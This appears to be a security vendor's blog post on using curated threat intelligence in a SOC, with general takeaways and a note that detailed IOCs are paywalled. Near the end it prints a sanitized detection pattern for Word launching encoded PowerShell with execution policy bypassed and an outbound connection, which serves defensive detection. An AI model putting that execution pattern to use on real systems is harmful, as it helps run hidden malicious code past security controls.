Why your SOC needs threat intelligence (and how to actually use it)

Published · 2026-04-28 · 8 min read

Most threat intel feeds are noise. Here is how we curate IOCs for our SOC analysts.

This article goes deeper into the topic with concrete examples drawn from our managed detection environments. Detailed technical breakdowns, IOCs, and detection rules are reserved for our paying subscribers, but the high-level narrative is here for everyone.

Background

In our SOC, we see thousands of alerts per day across hundreds of client environments. Patterns emerge. This is one of them.

The data presented here is anonymized and aggregated. No specific client environment is identifiable.

Key takeaways

If you remember nothing else from this article, remember these three things: defense-in-depth still works, your weakest control is usually identity, and detection without response is just noise.

# Example IOC pattern (sanitized)
process: powershell.exe
parent: winword.exe
cmdline: -ExecutionPolicy Bypass -EncodedCommand <b64>
network: outbound to non-CDN .com TLD on 443

← Back to all articles

Admin